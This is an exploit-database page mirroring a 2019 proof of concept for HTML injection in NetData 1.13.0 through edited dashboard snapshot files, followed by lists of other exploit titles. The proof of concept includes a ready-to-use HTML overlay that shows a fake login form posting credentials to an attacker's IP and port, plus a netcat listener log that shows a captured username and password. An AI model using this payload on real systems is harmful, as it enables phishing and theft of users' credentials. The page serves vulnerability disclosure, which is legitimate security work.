Become a patron and gain access to the dashboard, Schedule scans, API and Search patron

Search for hundreds of thousands of exploits

"NetData 1.13.0 - HTML Injection"

Author

Exploit author

s4vitar

Platform

Exploit platform

multiple

Release date

Exploit published date

2019-03-15

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
# ************************************************************************
# *                Author: Marcelo Vázquez (aka s4vitar)                 *
# *            NetData v1.13.0 HTML Injection Vulnerability              *
# ************************************************************************

# Exploit Title: NetData v1.13.0 HTML Injection Vulnerability
# Date: 2019-03-14
# Exploit Author: Marcelo Vázquez (aka s4vitar)
# Collaborators: Victor Lasa (aka vowkin)
# Vendor Homepage: https://my-netdata.io/
# Software Link: https://docs.netdata.cloud/packaging/installer/
# Version: <= NetData v1.13.0
# PoC Video (Credential Harvesting): https://www.youtube.com/watch?v=zSG93yX0B8k

NetData is prone to multiple HTML-injection vulnerabilities.

Successful exploitation will allow attacker-supplied HTML to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.

NetData 1.13.0 is vulnerable; other versions may also be affected. 

Proof of Concept:
=====================

1. Export a valid snapshot using the "export/save a netdata snapshot" function from the NetData dashboard (top right on the navigation bar).

2. Once it has finished exporting, attackers can manipulate the contents of said snapshot file and inject their own malicious HTML code. An example is provided below:

<div style='position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;'>Please login with valid credentials:<br></br><br>Please enter your credentials to see the content:</br><br><form name='login' action='http://attackerIP:port/'><table><tr><td>Username:</td><td><input type='text' name='username'/></td></tr><tr><td>Password:</td><td><input type='text' name='password'/></td></tr><tr><td colspan=2 align=center><input type='submit' value='Login'/></td></tr></table></form></div>

In this case, the attackers perform a credential theft attack where they specify the public IP and port from their own server, which is listening for new connections in order to receive the stolen credentials in plain text.

3. Import the newly modified snapshot using the "import/load a netdata snapshot" function from the NetData dashboard (top right on the navigation bar).

4. Once imported, the victim will see a login form that asks for their credentials.

5. After they are entered, the attacker can visualize said credentials in plain text on his own server, as they are sent through a simple GET request:

root@vps-server:~# nc -nlvp 4646
Listening on [0.0.0.0] (family 0, port 4646)
Connection from [XX.X.XXX.X] port 4646 [tcp/*] accepted (family 2, sport 36930)          
GET /?username=test&password=passwordexample HTTP/1.1                                    
Host: XXX.XXX.XX.XX:4646
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost:19999/
Accept-Encoding: gzip, deflate
Accept-Language: es-ES,es;q=0.9,en;q=0.8
Release Date Title Type Platform Author
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
Release Date Title Type Platform Author
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
2020-12-02 "EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Stored Cross Site Scripting" webapps multiple "Soushikta Chowdhury"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "EgavilanMedia User Registration & Login System with Admin Panel 1.0 - CSRF" webapps multiple "Hardik Solanki"
2020-12-02 "Student Result Management System 1.0 - Authentication Bypass SQL Injection" webapps multiple "Ritesh Gohil"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "WebDamn User Registration & Login System with User Panel - SQLi Auth Bypass" webapps multiple "Aakash Madaan"
Release Date Title Type Platform Author
2019-10-16 "X.Org X Server 1.20.4 - Local Stack Overflow" local linux s4vitar
2019-06-14 "CentOS 7.6 - 'ptrace_scope' Privilege Escalation" local linux s4vitar
2019-06-10 "Ubuntu 18.04 - 'lxd' Privilege Escalation" local linux s4vitar
2019-03-15 "NetData 1.13.0 - HTML Injection" webapps multiple s4vitar
2019-02-28 "FTP Server 1.32 - Denial of Service" dos android s4vitar
2019-02-21 "AirDrop 2.0 - Denial of Service (DoS)" dos android s4vitar
2019-02-21 "ScreenStream 3.0.15 - Denial of Service" dos android s4vitar
2019-02-15 "AirMore 1.6.1 - Denial of Service (PoC)" dos android s4vitar
2019-02-14 "ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (PoC)" dos android s4vitar
2019-02-11 "AirDroid 4.2.1.6 - Denial of Service" dos android s4vitar
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/46545/?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.